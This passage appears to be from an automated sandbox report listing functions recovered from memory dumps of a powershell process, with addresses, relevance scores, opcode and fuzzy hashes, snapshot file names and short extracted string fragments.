                                                                                      • Instruction ID: 452730b31836dbae6d2041f8e55a7c50393ce64b3462a019135d349e5482fc20
                                                                                      • Opcode Fuzzy Hash: cf796fdbbdbfc667575a69b7b369dcd02949a82d22aa076ce0979e44dfcf4219
                                                                                      • Instruction Fuzzy Hash: 36913970E11228CFEB54DFA9D885BAEBBF2BB89300F508169E449BB351DB749845CF40
                                                                                      Function 06D3CA40 Relevance: .2, Instructions: 213COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3b22e0143c05361c58f6dcb85dfddcb88579f985e6cf469f0aa773f3f989341
                                                                                      • Instruction ID: f1383e9aac926264c35fcea1a8577e961e4d22399d4497c35dccb5c9c64e7f85
                                                                                      • Opcode Fuzzy Hash: c3b22e0143c05361c58f6dcb85dfddcb88579f985e6cf469f0aa773f3f989341
                                                                                      • Instruction Fuzzy Hash: E3812A70E25228CFEB54DFA9D885BAEBBF2BB49300F508169E409BB351DB749945CF40
                                                                                      Function 06D3A3F0 Relevance: .1, Instructions: 140COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1cae8ec3db05003ddcefa6411b14d7d4d4b8aa51a3bd109c76cfb44293ecc232
                                                                                      • Instruction ID: 82dc9f8e1200e492ec4a6db79f76c7f5c3d0e8286a36a0defc289c3fee2ff88f
                                                                                      • Opcode Fuzzy Hash: 1cae8ec3db05003ddcefa6411b14d7d4d4b8aa51a3bd109c76cfb44293ecc232
                                                                                      • Instruction Fuzzy Hash: 56510870E15228CFEB44DFA9D848BEDBBF6BB49301F58902AD489A7290DB349D45CB50
                                                                                      Function 06D3A3E0 Relevance: .1, Instructions: 140COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ce822bfe0fc4159940972cac66727fc5729d3f81fcf9f1a3a3ac0ff6bb9d76b
                                                                                      • Instruction ID: a80a93e997cbb78dc9884de35efc6b99b1d9e04da6eccce87d95d771ebe2afb4
                                                                                      • Opcode Fuzzy Hash: 7ce822bfe0fc4159940972cac66727fc5729d3f81fcf9f1a3a3ac0ff6bb9d76b
                                                                                      • Instruction Fuzzy Hash: 95511A70E15228CFEB44DFA9D448BEDBBF2FB49301F54902AD489A7290DB749D46CB40
                                                                                      Function 073D8198 Relevance: 22.8, Strings: 18, Instructions: 346COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$4ll$4ll$<,ck$Xbml$Xbml$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-1206968258
                                                                                      • Opcode ID: a6a0d350a02c78a6c20442ab9e98994d8729ff5e624f76c1d3ff8cbafc413bac
                                                                                      • Instruction ID: 676c7a72b208f94b2adda6a9bcaa0d7366e42d2322b214be33d68c5628488c67
                                                                                      • Opcode Fuzzy Hash: a6a0d350a02c78a6c20442ab9e98994d8729ff5e624f76c1d3ff8cbafc413bac
                                                                                      • Instruction Fuzzy Hash: 32C119F2B0020ADFEB248E68E4457EB77A6BF45310F148466E50D8B690DB71ED41C751
                                                                                      Function 073DDFA1 Relevance: 16.4, Strings: 13, Instructions: 192COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$84ml$84ml$TQkq$TQkq$TQkq$tPfq$tPfq
                                                                                      • API String ID: 0-3993767156
                                                                                      • Opcode ID: e7a5ddd7beb1041e9ebeb7b636237baf30881e674cf176af385cffc983653faa
                                                                                      • Instruction ID: 9e746e0a425e1d9a889f44fc1d266007ec8f8c16fd5635aa6e7ab485e42d9a7e
                                                                                      • Opcode Fuzzy Hash: e7a5ddd7beb1041e9ebeb7b636237baf30881e674cf176af385cffc983653faa
                                                                                      • Instruction Fuzzy Hash: E261E7F2B4010ADFEB249FA9D4416AEBFB6BF85310F14849AE4195F681CB31DD41CB62
                                                                                      Function 073DB8D8 Relevance: 10.2, Strings: 8, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$$fq$$fq$$fq$Lol$Lol$Lol
                                                                                      • API String ID: 0-1349363526
                                                                                      • Opcode ID: d0c99518fa21cdc8165093d91e749f0b8de32d2bca0311b148be08e088d7cf14
                                                                                      • Instruction ID: 91e236acfe3dacaf99a47ac20bf5c1b79828671560122390f486b99565f10501
                                                                                      • Opcode Fuzzy Hash: d0c99518fa21cdc8165093d91e749f0b8de32d2bca0311b148be08e088d7cf14
                                                                                      • Instruction Fuzzy Hash: 9B6136F7B002468BEB259E6AA45066BFBE7AFC5210B25807BD549CB781DF31CC41C7A1
                                                                                      Function 073D7350 Relevance: 10.2, Strings: 8, Instructions: 171COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$84ml$tPfq$$fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-709185668
                                                                                      • Opcode ID: dd400895b9770df94f5cde9781f65a8a5bc91a01e237382be163c05aea688665
                                                                                      • Instruction ID: 90d5ef7a104c66742330e33d91366747a09398dd9161d44c818379d2cbfe0e39
                                                                                      • Opcode Fuzzy Hash: dd400895b9770df94f5cde9781f65a8a5bc91a01e237382be163c05aea688665
                                                                                      • Instruction Fuzzy Hash: 0051E2F2610206CFFB25CF19E144BAAB7B6AF45350F18C06AE80D9B690D771DC40CBA2
                                                                                      Function 08162A45 Relevance: 9.2, Strings: 7, Instructions: 488COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$Pqfq$x.`k$-`k
                                                                                      • API String ID: 0-2080334652
                                                                                      • Opcode ID: 9d1621e61c0e5b8fc88595019c0a8bb5a49d76b035667c6ca889b36531b57ccc
                                                                                      • Instruction ID: af6c8f950aaa1a803ee847d0aad0880db4bb128470ec9266de477c97e9664951
                                                                                      • Opcode Fuzzy Hash: 9d1621e61c0e5b8fc88595019c0a8bb5a49d76b035667c6ca889b36531b57ccc
                                                                                      • Instruction Fuzzy Hash: 12226074A002148FD724DB58C851BAABBB2FF84314F14C4E9E949AF751CB71ED928F91
                                                                                      Function 06D1DB68 Relevance: 7.9, Strings: 6, Instructions: 406COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (jq$4'fq$4'fq$4'fq$4'fq$pjq
                                                                                      • API String ID: 0-799542208
                                                                                      • Opcode ID: fba008e90cb7436eeead099d57a957f494b274d47ef07a2fb0f7ac39b51ca648
                                                                                      • Instruction ID: e232bcbf611d4c5e853e88a860121a18fb4248a53856c4266c38d5715b2ea656
                                                                                      • Opcode Fuzzy Hash: fba008e90cb7436eeead099d57a957f494b274d47ef07a2fb0f7ac39b51ca648
                                                                                      • Instruction Fuzzy Hash: 82D13C76A001149FCF45CFA8D840E9ABBB2FF88310F054498E609AF272DB71ED56DB90
                                                                                      Function 081677B8 Relevance: 7.8, Strings: 6, Instructions: 341COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$x.`k$-`k
                                                                                      • API String ID: 0-2124248366
                                                                                      • Opcode ID: aa759bfc2750d7bd673052c0d86a172932c40e5cfeaba0e1e2846efd1fbc2b28
                                                                                      • Instruction ID: 28fd7bed6dfe409ca19322aafe74d3df17347600ce99a216013420eac2c65d7a
                                                                                      • Opcode Fuzzy Hash: aa759bfc2750d7bd673052c0d86a172932c40e5cfeaba0e1e2846efd1fbc2b28
                                                                                      • Instruction Fuzzy Hash: C4E170B0A002159FDB14DF68C994B9AB7B2BF84304F1085E9D609AF795CB71ED82CF58
                                                                                      Function 08168247 Relevance: 7.8, Strings: 6, Instructions: 279COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$x.`k$-`k
                                                                                      • API String ID: 0-2124248366
                                                                                      • Opcode ID: 902f9cdf63d39a726aa8eb4861b6a1bcd670fde5e72191d74ccc88e610f59fa4
                                                                                      • Instruction ID: dc2f934485dfa260e4767246289dcdf568ef3d8d9e9cd67c90e05315596658a7
                                                                                      • Opcode Fuzzy Hash: 902f9cdf63d39a726aa8eb4861b6a1bcd670fde5e72191d74ccc88e610f59fa4
                                                                                      • Instruction Fuzzy Hash: C3C16FB0A002149FDB54DF18C994B9ABBB6BF84304F1081E9D648AB755CF71EE82CF95
                                                                                      Function 073DF728 Relevance: 6.6, Strings: 5, Instructions: 355COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-3759051638
                                                                                      • Opcode ID: 5123dbbde3345c578b98b040075dd1d36e99be2c725a54fb8187cbaf8625dfb4
                                                                                      • Instruction ID: f7e30b8956ab7154fb83257f51fe45bac6bb60755ff78f81cc0b26a628d9f681
                                                                                      • Opcode Fuzzy Hash: 5123dbbde3345c578b98b040075dd1d36e99be2c725a54fb8187cbaf8625dfb4
                                                                                      • Instruction Fuzzy Hash: 27C147F3B102079FEB148E68E4806AABBE6AF85314F14807AD52ACB641DB31DC85C791
                                                                                      Function 06D1A940 Relevance: 6.6, Strings: 5, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (jq$(jq$(jq$(jq$(jq
                                                                                      • API String ID: 0-2984211891
                                                                                      • Opcode ID: e0877e3bc683ab7c158812a642fc302f09c62baf1330fe8350bdad9cd4c9adf4
                                                                                      • Instruction ID: 497a377cfec6d4c4686b982ae5da27c7b54c36ca6441bdf22a900ba63a6ae632
                                                                                      • Opcode Fuzzy Hash: e0877e3bc683ab7c158812a642fc302f09c62baf1330fe8350bdad9cd4c9adf4
                                                                                      • Instruction Fuzzy Hash: 29C1F5317046555FDB559F79D890AAE3BA2EFC8711B1885AAE805CF392CE35DC02CBA0
                                                                                      Function 073D8EE8 Relevance: 6.6, Strings: 5, Instructions: 307COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0,ck$84ml$84ml$tPfq$tPfq
                                                                                      • API String ID: 0-102023139
                                                                                      • Opcode ID: 8d1b516ebc33ba98a4d47d906716e26e7ac9ae2e58a88e5532be69bb850c92f7
                                                                                      • Instruction ID: bd020c95c256a83c06f52c0f798aa1a5eaa7c6a54374bf65fc6ee80ba7348392
                                                                                      • Opcode Fuzzy Hash: 8d1b516ebc33ba98a4d47d906716e26e7ac9ae2e58a88e5532be69bb850c92f7
                                                                                      • Instruction Fuzzy Hash: 18A139F3B102068FEB119E69E4417ABB7E6EF85310F25807AD549CB681DB31EC45C792
                                                                                      Function 073D8798 Relevance: 6.5, Strings: 5, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ofq$(ofq$$fq$$fq$$fq
                                                                                      • API String ID: 0-4195024393
                                                                                      • Opcode ID: 96aec623c27df6717c482e9adc226dfc025949928e59903a2136388246c0a18d
                                                                                      • Instruction ID: 344f409740e67adb1a3854d6004f6858d35fbc30588f8f295e5bd5ceaccbc4c1
                                                                                      • Opcode Fuzzy Hash: 96aec623c27df6717c482e9adc226dfc025949928e59903a2136388246c0a18d
                                                                                      • Instruction Fuzzy Hash: 9F81F5F271020ADFEB148E69E8417EA77A7BF81310F14842AE5598BA90DB31FC55C762
                                                                                      Function 073D8179 Relevance: 6.4, Strings: 5, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-41860393
                                                                                      • Opcode ID: 3e2a601ac324aceccbf3c3c0df17b3bf31807c6cb2c9c8048f1576467bfc851b
                                                                                      • Instruction ID: 5ae463fe27190a76521b918f14f0d69c0075f669c49d20f56c5b5474033fcc4d
                                                                                      • Opcode Fuzzy Hash: 3e2a601ac324aceccbf3c3c0df17b3bf31807c6cb2c9c8048f1576467bfc851b
                                                                                      • Instruction Fuzzy Hash: 87518AF661420ADFEB25CE18E5447EA37B5BF41311F1880A6E80C8B590E376FD81CB61
                                                                                      Function 073DEC65 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ofq$(ofq$4'fq$84ml$tPfq
                                                                                      • API String ID: 0-3755626653
                                                                                      • Opcode ID: 0496b903cbd198d5af0d01afaaaa1d361bb9362343a74c47a67a198f0e988c5e
                                                                                      • Instruction ID: 673459cef6cf5c1d2b8ce5d5c8549903b079098d2423504ae71c0d5bb98e2e15
                                                                                      • Opcode Fuzzy Hash: 0496b903cbd198d5af0d01afaaaa1d361bb9362343a74c47a67a198f0e988c5e
                                                                                      • Instruction Fuzzy Hash: E741F3B3A40111DFE724CF58A551BABBFB6AF89710F1980A9D5189F291CB31DC41C7A1
                                                                                      Function 073D7608 Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ofq$(ofq$84ml$tPfq$$fq
                                                                                      • API String ID: 0-2472857586
                                                                                      • Opcode ID: 36ece9de252bf208ae22535776dad3fa5ced82cb50b5e44009ecb3e10a24d898
                                                                                      • Instruction ID: fed8ead9223002ad26edcfee43ffc4c7ecf1332f9986a01f1b9f8b3a22667646
                                                                                      • Opcode Fuzzy Hash: 36ece9de252bf208ae22535776dad3fa5ced82cb50b5e44009ecb3e10a24d898
                                                                                      • Instruction Fuzzy Hash: 54416EB3B002059FE7208F98E941B7ABBF6AF85314F25846AD9089F281DB71DD45CB91
                                                                                      Function 073D70E0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-41860393
                                                                                      • Opcode ID: bdb744a29491074c17889c6eedecadedae3ab19b1b2323a1033bb0d75256701f
                                                                                      • Instruction ID: f10055e94de15566091d4f1b412f94a687a0499906163bbf7e53b691328d106b
                                                                                      • Opcode Fuzzy Hash: bdb744a29491074c17889c6eedecadedae3ab19b1b2323a1033bb0d75256701f
                                                                                      • Instruction Fuzzy Hash: E2416DF261028ADFFF24CE14E5447AA37B9FB42351F148266E81D8B690E774DD80CB91
                                                                                      Function 073DA9C0 Relevance: 6.4, Strings: 5, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-41860393
                                                                                      • Opcode ID: 4214dc86410c47aa16ec46b37e846720f4990fb5ef43c86dbd12f123865ccb45
                                                                                      • Instruction ID: cd0ce7f8c64080e02c44272c7443984bed8e1659e9365be7ac6354a4bf8d00c4
                                                                                      • Opcode Fuzzy Hash: 4214dc86410c47aa16ec46b37e846720f4990fb5ef43c86dbd12f123865ccb45
                                                                                      • Instruction Fuzzy Hash: C731CEF3604206DFFF248E29E74076A77ABAB41250F08C16AE40D8B650D774DD82CB96
                                                                                      Function 073DB8B4 Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$$fq$$fq$Lol$Lol
                                                                                      • API String ID: 0-2136155652
                                                                                      • Opcode ID: 2cfe70b584428878ae232ca256b04271fcfa1efde878ed38eeacab4de2fbae44
                                                                                      • Instruction ID: e9ea09e716efc3c6cf641e44dd4c143d3b1bd3f43147a739e0f39f413c81b776
                                                                                      • Opcode Fuzzy Hash: 2cfe70b584428878ae232ca256b04271fcfa1efde878ed38eeacab4de2fbae44
                                                                                      • Instruction Fuzzy Hash: 9C31F0F7A00246CFEB208E21A54166AF7FAEF41210F1A406AC91C8B691DB36CD41CB62
                                                                                      Function 06D1CFE8 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (jq$(jq$Hjq$Hjq
                                                                                      • API String ID: 0-2589730892
                                                                                      • Opcode ID: d08afb7f384778c4145f359926ff91897a6f5819f2571ee0417da891b49ca2a3
                                                                                      • Instruction ID: 61b057b62d7530a96c5d6d40c06e72ad4042f02735eca1b294f708836e602d3b
                                                                                      • Opcode Fuzzy Hash: d08afb7f384778c4145f359926ff91897a6f5819f2571ee0417da891b49ca2a3
                                                                                      • Instruction Fuzzy Hash: DAE1E230B045559FCB58EF68D480AAEBBB2FF88310F158569E8059F3A5CB74EC46CB91
                                                                                      Function 08167848 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$x.`k$-`k
                                                                                      • API String ID: 0-771693012
                                                                                      • Opcode ID: 11783ff088941dce765e2f17dbd1d86f9700a2db355c96695108cd8e60f715ac
                                                                                      • Instruction ID: 9c4670783841ebbffc8e97b30bfae3396e9e709c153761da2a06ccf4a975f0a7
                                                                                      • Opcode Fuzzy Hash: 11783ff088941dce765e2f17dbd1d86f9700a2db355c96695108cd8e60f715ac
                                                                                      • Instruction Fuzzy Hash: 9FA171B0A402159FD714DF28C944B9EBBB2BF84304F1085E9D6096F795CB71AE82CF98
                                                                                      Function 06D34708 Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612750869.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (_fq$(_fq$(_fq$(_fq
                                                                                      • API String ID: 0-3776797759
                                                                                      • Opcode ID: ac14b69f04236e8a1fac1a87469eeb8177d383c200449b89138f1e0ec4404bca
                                                                                      • Instruction ID: 7c87f2947242e9a5590aaeda4096104d3d6c396c4fc980ac06b7e821095f0059
                                                                                      • Opcode Fuzzy Hash: ac14b69f04236e8a1fac1a87469eeb8177d383c200449b89138f1e0ec4404bca
                                                                                      • Instruction Fuzzy Hash: 7771AC74A00215CFCB54AF78D4994AEBBF6FF89300B24896DD4469B361EB36DC46CB90
                                                                                      Function 073DF510 Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-2113499236
                                                                                      • Opcode ID: 3fec52748e4ce4a91a209c2c157d2912a71df72366936769246234cb41faa8a4
                                                                                      • Instruction ID: cc35a7a7439c159aab0ec9b63380de9fd8455e0c4dc120fe4f636c91b23b672d
                                                                                      • Opcode Fuzzy Hash: 3fec52748e4ce4a91a209c2c157d2912a71df72366936769246234cb41faa8a4
                                                                                      • Instruction Fuzzy Hash: C3512AF37142078BE7245AB9A880767B7EA9FC5215F24C02AD52ECB691DF36CD418361
                                                                                      Function 08165EEC Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84ml$84ml$tPfq$tPfq
                                                                                      • API String ID: 0-3994916716
                                                                                      • Opcode ID: 011b92b61f8153f5d13a035c16a8f5c3ea155289e7250b3ddd9d8940b63397a4
                                                                                      • Instruction ID: 16c90cbe3860b9f0904265e4bb608ed8e9f6ed1b751be2ca1f60676b9a4417d3
                                                                                      • Opcode Fuzzy Hash: 011b92b61f8153f5d13a035c16a8f5c3ea155289e7250b3ddd9d8940b63397a4
                                                                                      • Instruction Fuzzy Hash: 2861C130B001049FDB149FADC441AAEBBE7BFC8715F158069EA05AF395CB71EC528BA5
                                                                                      Function 073DFC08 Relevance: 5.2, Strings: 4, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$rol$rol
                                                                                      • API String ID: 0-2791739562
                                                                                      • Opcode ID: 79b53f7401cc6c392d2f108bfdc46c7ba4883148bda094785d48c87454d07707
                                                                                      • Instruction ID: fda24fe2da2abcb18e21f5710c9e26ca22a544dc55c8bd5f6c45923e54638152
                                                                                      • Opcode Fuzzy Hash: 79b53f7401cc6c392d2f108bfdc46c7ba4883148bda094785d48c87454d07707
                                                                                      • Instruction Fuzzy Hash: DB5128B2B002068FEB14DFA8D4909AABBF5FF85314F14C46AD46E8B255CB31DD42CB91
                                                                                      Function 073DE367 Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$84ml$tPfq
